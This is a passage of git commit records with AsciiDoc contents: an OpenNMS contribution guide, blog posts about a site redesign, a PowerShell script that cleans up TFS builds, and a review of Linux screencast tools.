`NMS-6634-docs-DnsMonitor`.\nThis name is used later in the _Pull Request_ and helps to identify and track changes driven by this issue.\nType in the name in the input field and GitHub create the branch for you.\n\n.Create a working branch for the JIRA issue in your repository\nimage::..\/images\/02_create-branch-from-dev.png[]\n\n.Create a link in the JIRA issue to your working branch, it indicates somebody is working on it.\nimage::..\/images\/03_link-to-working-branch.png[]\n\nThere are two ways to work on the issue.\n\n * _Option 1_: Make a local copy and work on your local computer\n * _Option 2_: Edit directly all the files online in the GitHub web editor\n\n==== Work on your computer locally\n\nTo work on your local computer link:http:\/\/git-scm.com[_git_] or the link:https:\/\/windows.github.com[_GitHub GUI_] is required.\nClone your repository to you local computer with\n\n git clone https:\/\/github.com\/<your-github-nick>\/opennms.git\n\nIt will download the repository with all the branches to your local system in the 'opennms' directory.\nBy default you are in the _develop_ branch of OpenNMS.\nYou can switch to your previously created working branch with the following command:\n\n git checkout -b NMS-6634-docs-DnsMonitor origin\/NMS-6634-docs-DnsMonitor\n\nYou can show list all existing branches with\n\n git branch -r\n\nNow you have your working branch where you can start your contribution.\n\n.Create the documentation and save it!\nimage::..\/images\/04_your-contribution.png[]\n\nThe command `git status` gives you all changes.\nTo add your work to the version controlled history you have to add your changes to a commit.\nIn our example we have created the 'DnsMonitor.adoc' file and it is shown as currently untracked in git.\n\nThe command\n\n git add DnsMonitor.adoc\n\nadds this file for the next commit.\n\nNOTE: The full path to the file to add depends on your current location in the file system.\n\n.Add your created or modified files with git add.\nimage::..\/images\/05_add-to-git.png[]\n\nWrite a comment which explains what you did.\nThe first line in the commit message is used as a subject line and should contain the JIRA issue number and the JIRA issue subject.\nAfter the subject keep one empty line and you can use bullet points to describe your changes\n\n.Git comment with a subject line and bullet points for the description\nimage::..\/images\/06_git-comment.png[]\n\nThe commit with your change is now stored in the local history of your repository.\nWith the following command you can upload your changes to your GitHub repository.\n\n git push\n\n.Upload your changes to your GitHub repository\nimage::..\/images\/07_git-push.png[]\n\nNOTE: Upload changes to your repository doesn't have any effect on the project.\n You can use it as your backup and to stage your working progress.\n It also allows others to help you in your current working branch.\n\nThe next step is sending your changes to the official OpenNMS repository described in section <<guidedoc-gitflow-send-pull-request>>.\n\n==== Work with the GitHub Web editor\n\nIt is possible to work completely on the GitHub editor.\n\nWARNING: Be careful if you don't have a reliable internet connection.\n It could be possible you loose the content in case of connection loss.\n\nYou can create a new file your repository as following:\n\n.Create a new file with the `+` in (1)\nimage::..\/images\/13_web-create-new-file.png[]\n\n.Set a file name and create content and a commit message\nimage::..\/images\/14_web_filename-content-commit.png[]\n\n. File name to create in our case a new documentation file with the name 'DnsMonitor.adoc'\n. Documentation in _AsciiDoc_ format\n. Subject for the commit message with `NMS-<number>-docs-<Subject-without-spaces>`\n. Short information about your change\n\nYou can commit the change directly online by clicking on _Commit changes_ on the bottom end of the page.\n\nThe next step is sending your changes to the official OpenNMS repository described in section <<guidedoc-gitflow-send-pull-request>>.\n\n[[guidedoc-gitflow-send-pull-request]]\n==== Send the Pull Request\n\nIf you have finished, it's time to create a _Pull Request_ to indicate your contribution should go in the official OpenNMS codebase.\nCommit and push all your changes to your GitHub repository.\nCreate a _Pull Request_ from the GitHub web application with click on _Compare & pull request_.\nThe _Pull Request_ will be created automatically against the correct _develop_ branch.\n\n.Click on _Compare & pull request_\nimage::..\/images\/08_compare-branches.png[]\n\nGitHub will use your last git commit message for the _Pull Request_.\nAdd to your commit message the following information:\n\n----\nJIRA: http:\/\/issues.opennms.org\/browse\/NMS-6634\n\nTodo Review:\n- [ ] Typo and grammar\n- [ ] Formatting and conventions\n- [ ] Content\n----\n\nThis comment creates a review status indicator for the review.\n\n.Create a review status indicator in your _Pull Request_ message\nimage::..\/images\/09_create-review-indicator.png[]\n\nTo indicate you need a review set a link for the _Pull Request_ in the JIRA issue.\n\n.Create a link with a review request in the JIRA issue\nimage::..\/images\/10_doc-pull-request-issue.png[]\n\nReviewer can add annotations lines in your contributed changes.\nYou can work in this comments by just making your changes in your working branch, commit and push them to your repository.\nGitHub will automatically add this commits to your pull requests.\nIf the status for _Content_, _Formatting and conventions_ and _Typo and grammar_ is finished, the _Pull Request_ will be merged to the official OpenNMS code base.\n\nNOTE: You will be notified if a reviewer adds comments or request changes through the GitHub.\n\nIf your _Pull Request_ is merged you will be also notified and the status of your outstanding _Pull Request_ changes to status _Merged_ on your GitHub profile page.\n\n.Status of pull requests is indicated on your GitHub profile page\nimage::..\/images\/11_merged-pull-request.png[]\n\nThe OpenNMS Continuous Integration system based on _Bamboo_ picks up the merged pull request and starts a build and deploys a version with your changes automatically.\nYou can see the build jobs on the public available link:http:\/\/bamboo.internal.opennms.com:8085\/allPlans.action[Bamboo system].\n\nThis is my contribution to fix or enhance something.\n","returncode":0,"stderr":"","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"0baa5aaf0446b8990404be45326bc28a68c3c41c","subject":"Update 2016-01-06-Introducing-the-New-bGC2-Site.adoc","message":"Update 2016-01-06-Introducing-the-New-bGC2-Site.adoc","repos":"duggiemitchell\/JavascriptMuse,duggiemitchell\/JavascriptMuse,duggiemitchell\/JavascriptMuse","old_file":"_posts\/2016-01-06-Introducing-the-New-bGC2-Site.adoc","new_file":"_posts\/2016-01-06-Introducing-the-New-bGC2-Site.adoc","new_contents":"= Introducing the New bGC(2) Site\n:hp-image: https:\/\/lh3.googleusercontent.com\/ORoECpNWjVc7MILpWSs6AUliZYEFsW-VIOL8Ghts6e56vCxqP8pMYJ6woARqCcU7w2Zr-83vUc6gry0Tfi9BsCFUd-kA0UpRL1ApzPE05l3V-ovLGnX0ifx0mzLadySEuXaljgxpnaqKsQfGGHdttHeICfrdm2d1vhkfx6B7w-kKFHofWzErkYJqoSGMtZU0OSqpx7WZFdwzx2nPSOD30g45eTKUTHpROzlh9BEpeE-Lhm2a9TaKuiMQv4ppnWfG4Nlh_5q__PQrC_ajxHf-be29Hq6mmfbq5cLfSOMaVV27yE8ZhnhJYa15kEcaRolqWgF-ax50-8HXntiGGIgr-WfYkBu-QohwG8D3WnKb9w8KtFLK0_HF_xqZ8Wtg8-f6dXedEniEUEG-qWTIwvU4I5Mv9jyKrBwxPVF4G8HxoLd-uhD33M13cT-KETVT2rL7zSDI0J0D9bHZEemO8Y6JBk8B1YzH2T1t2tJ1wHSL3DTK_xd6LaAFlBLFC1M2thsUyd1swbkBvIR3HFOmuWHMhcMl3_z7S425IPv8bW7nfmJSVQfJEUlFPf-jEwnbgukFg0sn=w872-h657-no\n:hp-tags: blackGirlsCode, web design, Bootsrap\n\nI am pleased to announce the redesign of the link:blackgirlscode.github.io[GC(2)] site! This is something long overdue and I am very excited about it's development. It is almost night and day to the previous version and it is a testament of my growth as a developer. When I first took on this project, it took about three weeks and riddled with errors. I kept seeing this \"clearfix\" class thrown about and had no clue as to it's purpose; so I just deleted it. (Happy to say now I know whats it's for.) Plus, I used a template that was poor in design and poorly documented.\n\nUsing Bootstrap was neccesary to build, as well as a few jQuery Plugins. I feel at times, both are used when a simple boilerplate and Vanilla Javascript would suffice. I myself felt lazy using it to develop a website; but it was neccessary to achieve the big picture results I see for the organization. Plus time-savings had to to be considered; this week I am getting my hands dirty test-driving my link:https:codeschool.com[CodeSchool] subscription that was gifted for Christmas. \n\nThere still are things I'd like to add such as a schedule of events and the curriculum section for members, but at least for now it is not such an e\u0336m\u0336b\u0336a\u0336r\u0336r\u0336a\u0336s\u0336m\u0336e\u0336n\u0336t\u0336 eye-sore. \n\nFeatures are included that, before, I did not have the know-how to complete. Simple things like an image carousel, a fixed\/collapsed navigation bar, some cool transitions, member profiles and testimonials, etc. \n\nMore to come on this, but so far, so good!","old_contents":"= Introducing the New bGC(2) Site\n:hp-image: https:\/\/lh3.googleusercontent.com\/kHS0i7IG5jOlmhA0vWs1MCCoJ_uZblRpIfVLPVqojDhwuAhlf_Q7Q-Yu3mwT5ojpDQr_2M0YJ7MirCWkNccAeekwetEsXV7hrHMTp22YYPdZE4tvltpzal5fnu0NygITR_mvEf8O58jNqgklSthDKFONm34e9_pQLmTx-nFH3Rhc1XAJwl58XXqo0tphhO3AOWrQhZuFNqtrCxsRMDOczsW0uGN8DOofGGPzMspaBPbP87KENZXSO9Jo9dmF6c7OfjrVLoLcEFPT_RhgSECLXdl9NyEypWPZG8jbmn76KxLFySB5t79ZABYJduhbVB95rbi-uOeNJfu_RTJGjh8QaYErMajyNcaQLjS-a8e1tkZi8DZaFF43334yw0voh2PPQDeFLnQ-G15nvTt881gFMK4Kgiedtviz9c2sGYLTi55t63Ir_BC4C8VMJWq-WwMnYnWyeX0U7gUHVHdxgqZ3H4CwbRNFvNOaE4kabTvfwOkhnHLR-F8LhgxxB8zlXEcZMjHqn-Pz6V4wbyU1ylFGLq_R-_jPrSRCVFAINhDLqfMrySWjvsaLrPyfRP6dSUw526cY=w1307-h657-no\n:hp-tags: blackGirlsCode, web design, Bootsrap\n\nI am pleased to announce the redesign of the link:blackgirlscode.github.io[GC(2)] site! This is something long overdue and I am very excited about it's development. It is almost night and day to the previous version and it is a testament of my growth as a developer. When I first took on this project, it took about three weeks and riddled with errors. I kept seeing this \"clearfix\" class thrown about and had no clue as to it's purpose; so I just deleted it. (Happy to say now I know whats it's for.) Plus, I used a template that was poor in design and poorly documented.\n\nUsing Bootstrap was neccesary to build, as well as a few jQuery Plugins. I feel at times, both are used when a simple boilerplate and Vanilla Javascript would suffice. I myself felt lazy using it to develop a website; but it was neccessary to achieve the big picture results I see for the organization. Plus time-savings had to to be considered; this week I am getting my hands dirty test-driving my link:https:codeschool.com[CodeSchool] subscription that was gifted for Christmas. \n\nThere still are things I'd like to add such as a schedule of events and the curriculum section for members, but at least for now it is not such an e\u0336m\u0336b\u0336a\u0336r\u0336r\u0336a\u0336s\u0336m\u0336e\u0336n\u0336t\u0336 eye-sore. \n\nFeatures are included that, before, I did not have the know-how to complete. Simple things like an image carousel, a fixed\/collapsed navigation bar, some cool transitions, member profiles and testimonials, etc. \n\nMore to come on this, but so far, so good!","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"b03f5e8dcc5b4b6b3e59b1fcb82ac92501aff372","subject":"Update 2017-03-14-Troubleshooting-TFS-DB-Growth.adoc","message":"Update 2017-03-14-Troubleshooting-TFS-DB-Growth.adoc","repos":"dannylane\/dannylane.github.io,dannylane\/dannylane.github.io,dannylane\/dannylane.github.io,dannylane\/dannylane.github.io","old_file":"_posts\/2017-03-14-Troubleshooting-TFS-DB-Growth.adoc","new_file":"_posts\/2017-03-14-Troubleshooting-TFS-DB-Growth.adoc","new_contents":"= Troubleshooting TFS DB Growth\n:hp-tags: TFS, ReleaseManager\n:published_at: 2017-03-14\n:hardbreaks:\n\n*Spoiler:* This was caused by ReleaseManager 2013 retaining builds. Read on for the work around that was put in place.\n\nAs part of a project I was working on recently; I put in a lot of work around TFS Builds, Unit\/Integration Tests & continous delivery using ReleaseManager.\n\nIt was a fairly standard pipeline:\n\u2192 Checkin \u2192 Unit & Integration Tests Run \u2192 Build \u2192 Release To Test\n\nUp until this project the TFS Build hadn't been used, TFS was just used for source control and some workitem tracking, it was hosted on a VM and didn't take up much apce ********TODO The DB for TFS was a SQL express on the TFS VM (it has since been moved off to a physical server with DR)\n\nAfter a few months of the project I started getting reports that the TFS VM size was growing constantly. IT had to increase the disk size on the VMs a couple of times.\n\nIt turns out that the VM had grown from ***TODO \n\nAfter doing a little research online I found the following query that gives some insight into which tables are taking up the most space in the db.\n\n[source,sql]\n----\nUSE Tfs_DefaultCollection\n \nSELECT\n t.NAME AS TableName,\n s.Name AS SchemaName,\n p.rows AS RowCounts,\n SUM(a.total_pages) * 8 AS TotalSpaceKB,\n SUM(a.used_pages) * 8 AS UsedSpaceKB,\n (SUM(a.total_pages) - SUM(a.used_pages)) * 8 AS UnusedSpaceKB\nFROM\n sys.tables t\nINNER JOIN \n sys.indexes i ON t.OBJECT_ID = i.object_id\nINNER JOIN\n sys.partitions p ON i.object_id = p.OBJECT_ID AND i.index_id = p.index_id\nINNER JOIN\n sys.allocation_units a ON p.partition_id = a.container_id\nLEFT OUTER JOIN\n sys.schemas s ON t.schema_id = s.schema_id\nGROUP BY\n t.Name, s.Name, p.Rows\nORDER BY\n TotalSpaceKB desc\n----\n\n\n**TODO table with high storage & explanation\n\n\nNormally TFS retains builds as defined by a build retention policy, ours tells it to only keep the last 10 builds.\nHowever, there is a known issue with the Microsoft Release Management 2013 that causes every build that is involved in a release to be retained indefinitely, this doesn't really fit with the continous delivery model and has been changed in newer versions.\nEvery check in we do triggers a build which triggers a release so all our builds are retained.\n \nThis has issues for the storage capacity on the drops folder where builds are dropped and also storage capacity in the database.\n \nThe issue was exacerbated for this project because of the logging setup in the integration tests. Each test class library gets a DB deployed and dropped and seed scripts run, all the logging from these activities is echoed to the console. The application logging is also set to console output.\nAll this log info for each test run is stored in the TFS database which grew unmanageably.\nThe logging was turned off on the automated builds so this should help keep the size down for newer builds\n\n** todo logmanager stuff for builds\n\nTo manage the retained builds I wrote a powershell script that does the following steps for every build older than 2 weeks:\n\n. Update the Retain Indefinitely flag to false\n. Delete the build \n. Destroy the build \n \n*Delete the build*\nThis is what is available through the UI, it is only a logical delete and while it does delete artifacts from the network drop folders, it does not delete rows from the db\n\n*Destroy the build*\nThis is the delete from the db. This is not available though the UI and is only available through the API\n\nI setup a build in TFS that runs at 3am every day and runs this scripts as part of the build.\n \n[source,powershell]\n----\nparam ($serverName = 'http:\/\/<snip>:8080\/tfs\/DefaultCollection')\n\n[void][System.Reflection.Assembly]::LoadWithPartialName(\"Microsoft.TeamFoundation.Client\")\n[void][System.Reflection.Assembly]::LoadWithPartialName(\"Microsoft.TeamFoundation.Build.Client\")\n[void][System.Reflection.Assembly]::LoadWithPartialName(\"Microsoft.TeamFoundation.VersionControl.Client\")\n$tfs = [Microsoft.TeamFoundation.Client.TeamFoundationServerFactory]::GetServer($serverName)\n\n$buildServer = $tfs.GetService([Microsoft.TeamFoundation.Build.Client.IBuildServer])\n$vcs = $tfs.GetService([Microsoft.TeamFoundation.VersionControl.Client.VersionControlServer])\n\n$projects = $vcs.GetAllTeamProjects($true) # We will run this for all team projects\n\nforeach ($project in $projects){\n Write-Host $project.Name\n\n $buildDefs = $buildServer.QueryBuildDefinitions($project.Name) # Get all the build definitions for a given project\n\n foreach ($buildDef in $buildDefs){\n Write-Host \"-\" + $buildDef.Name\n\t\t$endDate = (Get-Date).AddDays(-14) # Delete all builds older than 14 days. This is a bit aggressive and can be pushed to a month once the logs are smaller on automated builds.\n while($endDate.Year -ge 2014){ # Keep going back until we hit dec 2014\n $year = $endDate.Year\n $month = $endDate.Month\n write-host $year $month\n $buildDetailSpec = $buildServer.CreateBuildDetailSpec($project.Name, $buildDef.Name) # Create a search object for the project\/build def\n $startDate = $endDate.addMonths(-1)\n $buildDetailSpec.MaxFinishTime = $endDate # Search criteria\n $buildDetailSpec.MinFinishTime = $startDate # Search criteria\n $buildDetailSpec.InformationTypes = $null # only build info, not workitems, labels, etc\n\n\t\t\t## This is important for the query, builds that are deletd by retention or the ui are only logically deleted, not destroyed in the db\n $buildDetailSpec.QueryDeletedOption = [Microsoft.TeamFoundation.Build.Client.QueryDeletedOption]::IncludeDeleted \n\n $builds = $buildServer.QueryBuilds($buildDetailSpec) # Search all the things\n if($builds.Builds.Length -ge 1){\n Write-Host \"before update\" $builds.Builds\n foreach($build in $builds.Builds){ # Need to turn off the Keep Forever (Retain) flag set by Release Manager.\n if ($build.KeepForever -eq $true){\n Write-Host \"Updating build \" $build.Uri\n $buildToEdit = $buildServer.GetBuild($build.Uri) # Gets an updatable ref to the build\n $buildToEdit.KeepForever = $false; # Edit the build flag\n $buildServer.SaveBuilds(@($buildToEdit)) # save the build back to the tfs\n }\n }\n $builds = $buildServer.QueryBuilds($buildDetailSpec) # refresh the query given that some of the builds have been updated\n Write-Host \"after refresh\" $builds.Builds\n $buildServer.DeleteBuilds($builds.Builds, [Microsoft.TeamFoundation.Build.Client.DeleteOptions]::All) # Delete the build, test results, symbols, drop, etc.\n $buildServer.DestroyBuilds($builds.Builds) # Destroy the db records\n }\n \n $endDate = $endDate.addMonths(-1) # rolling back the years.\n } \n }\n}\n\n----\n\n\n|===\n|TableName|SchemaName|RowCounts|TotalSpaceKB|UsedSpaceKB|UnusedSpaceKB\n|tbl_Content|dbo|69733|1889136|1869000|20136\n\n|tbl_TestResult|dbo|174868|323192|321504|1688\n\n|tbl_LocalVersion|dbo|413449|122072|120048|2024\n\n|tbl_BuildCodeChange|dbo|148950|78016|77824|192\n\n|tbl_Version|dbo|101484|68872|68544|328\n\n|tbl_BuildInformation2|dbo|88673|64232|63512|720\n\n|tbl_Command|dbo|92974|39192|38928|264\n|===\n\n++ You can see the output from the script in the Diagnostics tab from the build:\n++ This is where the script is configured: \n++ This is the build trigger:\n\n\n\n\n\nimage::buildpurge\/dummyproject.png[]\n\n\n \n\n\n\n\n\n\n\n\n\n\n\n\n","old_contents":"= Troubleshooting TFS DB Growth\n:hp-tags: TFS, ReleaseManager\n:published_at: 2017-03-14\n:hardbreaks:\n\n*Spoiler:* This was caused by ReleaseManager 2013 retaining builds. Read on for the work around that was put in place.\n\nAs part of a project I was working on recently; I put in a lot of work around TFS Builds, Unit\/Integration Tests & continous delivery using ReleaseManager.\n\nIt was a fairly standard pipeline:\n\u2192 Checkin \u2192 Unit & Integration Tests Run \u2192 Build \u2192 Release To Test\n\nUp until this project the TFS Build hadn't been used, TFS was just used for source control and some workitem tracking, it was hosted on a VM and didn't take up much apce ********TODO The DB for TFS was a SQL express on the TFS VM (it has since been moved off to a physical server with DR)\n\nAfter a few months of the project I started getting reports that the TFS VM size was growing constantly. IT had to increase the disk size on the VMs a couple of times.\n\nIt turns out that the VM had grown from ***TODO \n\nAfter doing a little research online I found the following query that gives some insight into which tables are taking up the most space in the db.\n\n[source,sql]\n----\nUSE Tfs_DefaultCollection\n \nSELECT\n t.NAME AS TableName,\n s.Name AS SchemaName,\n p.rows AS RowCounts,\n SUM(a.total_pages) * 8 AS TotalSpaceKB,\n SUM(a.used_pages) * 8 AS UsedSpaceKB,\n (SUM(a.total_pages) - SUM(a.used_pages)) * 8 AS UnusedSpaceKB\nFROM\n sys.tables t\nINNER JOIN \n sys.indexes i ON t.OBJECT_ID = i.object_id\nINNER JOIN\n sys.partitions p ON i.object_id = p.OBJECT_ID AND i.index_id = p.index_id\nINNER JOIN\n sys.allocation_units a ON p.partition_id = a.container_id\nLEFT OUTER JOIN\n sys.schemas s ON t.schema_id = s.schema_id\nGROUP BY\n t.Name, s.Name, p.Rows\nORDER BY\n TotalSpaceKB desc\n----\n\n\n**TODO table with high storage & explanation\n\n\nNormally TFS retains builds as defined by a build retention policy, ours tells it to only keep the last 10 builds.\nHowever, there is a known issue with the Microsoft Release Management 2013 that causes every build that is involved in a release to be retained indefinitely, this doesn't really fit with the continous delivery model and has been changed in newer versions.\nEvery check in we do triggers a build which triggers a release so all our builds are retained.\n \nThis has issues for the storage capacity on the drops folder where builds are dropped and also storage capacity in the database.\n \nThe issue was exacerbated for this project because of the logging setup in the integration tests. Each test class library gets a DB deployed and dropped and seed scripts run, all the logging from these activities is echoed to the console. The application logging is also set to console output.\nAll this log info for each test run is stored in the TFS database which grew unmanageably.\nThe logging was turned off on the automated builds so this should help keep the size down for newer builds\n\n** todo logmanager stuff for builds\n\nTo manage the retained builds I wrote a powershell script that does the following steps for every build older than 2 weeks:\n\n. Update the Retain Indefinitely flag to false\n. Delete the build \n. Destroy the build \n \n*Delete the build*\nThis is what is available through the UI, it is only a logical delete and while it does delete artifacts from the network drop folders, it does not delete rows from the db\n\n*Destroy the build*\nThis is the delete from the db. This is not available though the UI and is only available through the API\n\nI setup a build in TFS that runs at 3am every day and runs this scripts as part of the build.\n \n[source,powershell]\n ----\n param ($serverName = 'http:\/\/<snip>:8080\/tfs\/DefaultCollection')\n\n[void][System.Reflection.Assembly]::LoadWithPartialName(\"Microsoft.TeamFoundation.Client\")\n[void][System.Reflection.Assembly]::LoadWithPartialName(\"Microsoft.TeamFoundation.Build.Client\")\n[void][System.Reflection.Assembly]::LoadWithPartialName(\"Microsoft.TeamFoundation.VersionControl.Client\")\n$tfs = [Microsoft.TeamFoundation.Client.TeamFoundationServerFactory]::GetServer($serverName)\n\n$buildServer = $tfs.GetService([Microsoft.TeamFoundation.Build.Client.IBuildServer])\n$vcs = $tfs.GetService([Microsoft.TeamFoundation.VersionControl.Client.VersionControlServer])\n\n$projects = $vcs.GetAllTeamProjects($true) # We will run this for all team projects\n\nforeach ($project in $projects){\n Write-Host $project.Name\n\n $buildDefs = $buildServer.QueryBuildDefinitions($project.Name) # Get all the build definitions for a given project\n\n foreach ($buildDef in $buildDefs){\n Write-Host \"-\" + $buildDef.Name\n\t\t$endDate = (Get-Date).AddDays(-14) # Delete all builds older than 14 days. This is a bit aggressive and can be pushed to a month once the logs are smaller on automated builds.\n while($endDate.Year -ge 2014){ # Keep going back until we hit dec 2014\n $year = $endDate.Year\n $month = $endDate.Month\n write-host $year $month\n $buildDetailSpec = $buildServer.CreateBuildDetailSpec($project.Name, $buildDef.Name) # Create a search object for the project\/build def\n $startDate = $endDate.addMonths(-1)\n $buildDetailSpec.MaxFinishTime = $endDate # Search criteria\n $buildDetailSpec.MinFinishTime = $startDate # Search criteria\n $buildDetailSpec.InformationTypes = $null # only build info, not workitems, labels, etc\n\n\t\t\t## This is important for the query, builds that are deletd by retention or the ui are only logically deleted, not destroyed in the db\n $buildDetailSpec.QueryDeletedOption = [Microsoft.TeamFoundation.Build.Client.QueryDeletedOption]::IncludeDeleted \n\n $builds = $buildServer.QueryBuilds($buildDetailSpec) # Search all the things\n if($builds.Builds.Length -ge 1){\n Write-Host \"before update\" $builds.Builds\n foreach($build in $builds.Builds){ # Need to turn off the Keep Forever (Retain) flag set by Release Manager.\n if ($build.KeepForever -eq $true){\n Write-Host \"Updating build \" $build.Uri\n $buildToEdit = $buildServer.GetBuild($build.Uri) # Gets an updatable ref to the build\n $buildToEdit.KeepForever = $false; # Edit the build flag\n $buildServer.SaveBuilds(@($buildToEdit)) # save the build back to the tfs\n }\n }\n $builds = $buildServer.QueryBuilds($buildDetailSpec) # refresh the query given that some of the builds have been updated\n Write-Host \"after refresh\" $builds.Builds\n $buildServer.DeleteBuilds($builds.Builds, [Microsoft.TeamFoundation.Build.Client.DeleteOptions]::All) # Delete the build, test results, symbols, drop, etc.\n $buildServer.DestroyBuilds($builds.Builds) # Destroy the db records\n }\n \n $endDate = $endDate.addMonths(-1) # rolling back the years.\n } \n }\n}\n\n----\n\n\n|===\n|TableName|SchemaName|RowCounts|TotalSpaceKB|UsedSpaceKB|UnusedSpaceKB\n|tbl_Content|dbo|69733|1889136|1869000|20136\n\n|tbl_TestResult|dbo|174868|323192|321504|1688\n\n|tbl_LocalVersion|dbo|413449|122072|120048|2024\n\n|tbl_BuildCodeChange|dbo|148950|78016|77824|192\n\n|tbl_Version|dbo|101484|68872|68544|328\n\n|tbl_BuildInformation2|dbo|88673|64232|63512|720\n\n|tbl_Command|dbo|92974|39192|38928|264\n|===\n\n++ You can see the output from the script in the Diagnostics tab from the build:\n++ This is where the script is configured: \n++ This is the build trigger:\n\n\n\n\n\nimage::buildpurge\/dummyproject.png[]\n\n\n \n\n\n\n\n\n\n\n\n\n\n\n\n","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"b56883f942086e6ac5eb4bc1168ae5be439db76e","subject":"Remove massive amount of spaces","message":"Remove massive amount of spaces\n","repos":"wzzrd\/hubpress.io,wzzrd\/hubpress.io,wzzrd\/hubpress.io,wzzrd\/hubpress.io","old_file":"_posts\/2017-06-21-Creating-screencasts-on-Linux.adoc","new_file":"_posts\/2017-06-21-Creating-screencasts-on-Linux.adoc","new_contents":"= Creating screencasts on Linux\n:published_at: 2017-06-21\n:hp-tags: screencasts, Fedora, meta\n\n=== Intro\n\nAs this is a new blog on Fedora Planet, let me start off by introducing myself briefly. My name is Maxim Burgerhout, and I have been a Fedora contributor for quite some time. Truth be told though, I haven't been able to spend much time maintaining my packages over the past couple of years. As a different way of giving back, I want to start sharing some experiences with open source software in a specific niche: screencast creation, and video editing.\n\n=== Background\n\nA couple of months back, I started recording screencasts about Red Hat products.footnote:[I work as a solution architect for Red Hat in the Benelux region]. For now, it's mostly about management products, like Satellite, Ansible Tower and things like that, but I'll potentially also cover other products and projects as they pop up in my daily work, and as said above, I intend to start sharing some experiences.footnote:[How-to's, why this and not that, and who knows: screencasts ;)] about creating screencasts on Fedora.\n\nAssuming more people are trying to figure out the same things I am, I'm starting off with a short write-up of my experiences so far, trying to work with open source software to create screencasts. Spoiler: it's not as easy as I hoped it would be. \n\nThe below article is based on my experience using Fedora 25.\n\n\n=== Recording video\n\nEver since I started doing this, I've been using http:\/\/screencastify.com\/[Screencastify] as my screen recorder of choice. I have tried using the https:\/\/extensions.gnome.org\/extension\/690\/easyscreencast\/[EasyScreencast] Gnome Shell extension in the beginning, but it had (temporarily) died, so that didn't seem viable. It seems to have revived though, so I'll probably try it again when my Screencastify subscription expires near the end of the calendar year.\n\nI also tried the https:\/\/help.gnome.org\/users\/gnome-help\/stable\/screen-shot-record.html.en[CTRL-ALT-SHIFT-R] option to start a screencast recording in Gnome, but that records both my monitors, which makes editing the whole thing into a Youtube video quite a pain.footnote:[If you know who to limit this to a single monitor, or even better: a single window, I'm all ears!].\n\nFinally, gtk-recordmydesktop gives me all kinds of strange artifacts in my recording when I move my mouse. It also seemed to crash quite frequently, and seems to be dead upstream.\n\nAll options available from the community (the built-in one, gtk-recordmydesktop and EasyScreencast) were disqualified for various reasons, either because of lack of maintenance, quircks or instability.\n\nHowever, apart from the occasional crash (which happens very seldomly), Screencastify works beautifully. I can record a window, a Chrome tab, or my whole desktop. Recording my voice over the videos also works pretty well, using a USB microphone I bought for the purpose of creating screencasts.\n\nThe downside of Screencastify is that it's a proprietary piece of software. For now, it's the clear winner, but in the future I'll give EasyScreencast a go for it's money again.\n\n\n=== Recording audio on it's own\n\nRecording audio on Fedora can be done through various options, of which the two most obvious are https:\/\/wiki.gnome.org\/Design\/Apps\/SoundRecorder[Sound Recorder] and http:\/\/www.audacityteam.org\/[Audacity].\n\nSound Recorder is the default sound recorder app in Gnome 3. It's OK for very simple usage, but the moment you want to start editing audio or improving audio quality using filters, Sound Recorder doesn't offer anything.\n\nAudacity on the contrary, is *very* complete. It's even a bit intimidating in the amount of options it offers, but in terms of recording quality, editing the recordings and improving their quality, Audacity is the de-facto standard in open source, on Linux as well as on various other platforms. Simply said, it's brilliant.\n\nAudacity is the clear winner hear, without any real competition.\n\n\n=== Editing video\n\nSo this is where the real pain starts. Save to say, video editing on Linux was a bit of a disappointment for me.\n\nI have tried all of the major video editing open source projects that available natively on Fedora: Kdenlive, Pitivi, Avidemux and OpenShot, as well as the commercially available Lightworks.\n\nTo start with http:\/\/fixounet.free.fr\/avidemux\/[Avidemux]: it seems to lack the full broad spectrum of features one would need to edit and merge large amounts of clips into a new video, and insert transitions and background audio. I assume it would work nicely to just crop two videos and slam them together, but it doesn't feel right for more complex things. Granted, I haven't spent a huge amount with this program, so let me know if you think I'm dismissing Avidemux too easily. It just wasn't enough for me.\n\nNext up are http:\/\/www.openshot.org\/[OpenShot] and https:\/\/kdenlive.org\/[Kdenlive]. Both great programs, both with extensive feature sets that would suffice for me and both with the same continuous problem that disqualified them: they crash. Over and over. I'll be filing bugs for both, but no matter how that turns out, right NOW, they are not very useful for me. Both seem to have somewhat lively upstreams tho, so who knows what the future might bring. \n\nSadly, I've spent too much time trying to get OpenShoft and Kdenlive to work, and that kept me from thoroughly evaluating my next contender: https:\/\/git.gnome.org\/browse\/pitivi[Pitivi].\n\nPitivi used to fall into the same category as OpenShoft and Kdenlive (crashing), but I haven't experienced any crashes recently. I comes with a nice set of effects, just like OpenShoft and Kdenlive, and is fairly easy to use. It exports to all of the right formats, but sadly, rendering of video happens in the foreground. This blocksyou from using the program during that process. Not a big deal for a video of a couple of minutes, but annoying for anything longer than that.\n\nThe final program I just had to take a look at, is Lightworks. It's not open source, but it really is bloody good. It's by far the most complete of the lot, but it comes at a hefty price. Also, some of the options that are really interesting for making screencasts, like a built-in voice-over recorder, isn't available on Linux :(\n\nI would say for video editing, Pitivi and Lightworks are tied, with Lightworks being the more complete option, and Pitivi being the open source one.\n\n\n=== Conclusion\n\nAudio editing we have under control in open source. Audacity is great. It's just really, really great. (There, enough Trumpianisms for today.)\n\nScreencast recording has come a long way, but hasn't quite reached the level of functionality I needed a couple of months back. It might have grown to that level in the meantime, though. I'll take the time to re-evaluate EasyScreencast and post an update sometime in the Fall.\n\nVideo editing is still a bit of a problem. The commercial option is good, but pretty expensive and obviously not open source. Two of the three main contenders (OpenShot and Kdenlive) have serious stability issues, up to the point that I just gave up on them. Bugs will be filed, but that's not helping me today. Pitivi is a little less complete than both OpenShot and Kdenlive, I think, but does show promise (and doesn't crash that often). \n\nAs with EasyScreencast, I'll give Pitivi as second try and hopefully find an open source solution for my video editing problem.\n\nTL;DR if you are looking for a set of tools to record and edit screencasts on Fedora, you probably want to check out EasyScreencast, and use Screencastify as a fall-back option. For audio, there's no way around Audacity. If you can shell out some dough and don't mind a bit of proprietary software, go for Lightworks, otherwise Pitivi will help you overcome most video editing problems.\n\nM\n\n","old_contents":"= Creating screencasts on Linux\n:published_at: 2017-06-21\n:hp-tags: screencasts, Fedora, meta\n\n=== Intro\n\nAs this is a new blog on Fedora Planet, let me start off by introducing myself briefly. My name is Maxim Burgerhout, and I have been a Fedora contributor for quite some time. Truth be told though, I haven't been able to spend much time maintaining my packages over the past couple of years. As a different way of giving back, I want to start sharing some experiences with open 